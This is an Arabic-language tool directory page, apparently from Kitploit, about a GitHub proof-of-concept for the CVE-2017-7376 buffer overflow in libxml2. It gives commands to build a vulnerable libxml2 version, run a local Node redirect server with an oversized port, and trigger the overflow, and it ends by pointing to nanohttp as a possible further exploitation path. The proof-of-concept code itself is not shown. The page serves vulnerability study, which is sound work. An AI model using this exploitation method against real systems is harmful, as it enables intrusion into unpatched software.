Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
libxml2-exploit — مثال لاستغلال ثغرة CVE-2017-7376 | Kitploit
أدوات/GitHubGitHub/brahmstaedt/libxml2-exploit
تحليل الثغرات الأمنيةالاستغلالأمن الويبالاختبار العشوائياستغلال الملفات الثنائية
GitHubbrahmstaedt/libxml2-exploit

libxml2-exploit

مثال لاستغلال ثغرة CVE-2017-7376

عرض المستودع
33منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

libxml2-exploit

مثال ثغرة لـ CVE-2017-7376

التثبيت

قم بتنزيل هذا المستودع وإصدار ضعيف من libxml2، مثلاً v2.7.7:

root@kitploit:~
git clone https://github.com/brahmstaedt/libxml2-exploit.git
cd libxml2-exploit
wget https://github.com/GNOME/libxml2/archive/v2.7.7.zip
unzip v2.7.7.zip
mv libxml2-2.7.7/ libxml2

الإعداد

root@kitploit:~
cd libxml2

إعداد libxml2

لجعل نجاح الثغرة أكثر وضوحًا، أضف كودًا لاكتشاف تجاوز سعة المخزن المؤقت إلى libxml2. غير ضروري إذا كانت لديك وسائل أخرى للرؤية، مثل تعطل التطبيق.

root@kitploit:~
git apply ../nanohttp.patch

بناء libxml2

root@kitploit:~
./autogen.sh --prefix=$(pwd)/ --without-python
make
make install

في حالة الخطأ التالي:

root@kitploit:~
aclocal: warning: autoconf input should be named 'configure.ac', not 'configure.in'

استبدل في configure.in AM_C_PROTOTYPES بـ dnl AM_C_PROTOTYPES، مثلاً هكذا:

root@kitploit:~
sed 's:AM_C_PROTOTYPES:dnl AM_C_PROTOTYPES:' configure.in -i

ارجع للخلف

root@kitploit:~
cd ..

إعداد خادم الويب

تتطلب هذه الثغرة خادم ويب يستجيب بإعادة توجيه إلى عنوان URL جديد برقم منفذ أكبر من 5 أرقام وأقل من int32max (2147483648 = 2^32/2).

ابدأ الخادم (يتطلب Node JS وأن يكون المنفذ 127.0.0.1:8080 غير مستخدم):

root@kitploit:~
node http.js &

اختبر خادم الويب؛ يجب أن يشتكي من رقم المنفذ غير الصحيح 2147426192:

root@kitploit:~
wget localhost:8080

الترجمة

root@kitploit:~
make

التشغيل

root@kitploit:~
./run.sh

الإخراج المتوقع:

root@kitploit:~
Buffer overflow is detected
I/O warning : failed to load HTTP resource
buffer_overflow.xml:4: element include: XInclude error : could not load http://localhost:8080/dummy.xml, and no fallback was found
Failed to process include buffer_overflow.xml

المهام المستقبلية

يتطلب هذا المثال التوضيحي للثغرة أن يقوم البرنامج الرئيسي بتنفيذ xmlXIncludeProcess() للوصول إلى الكود المعيب في libxml2، وهو أمر غير محتمل الاستخدام في العديد من التطبيقات الفعلية. ولكن nanohttp.c يذكر في التعليق أنها تنفيذ minimalist لـ HTTP GET لجلب المجموعات الخارجية مما قد يوفر مسارًا آخر للاستغلال.

تنزيل الأداة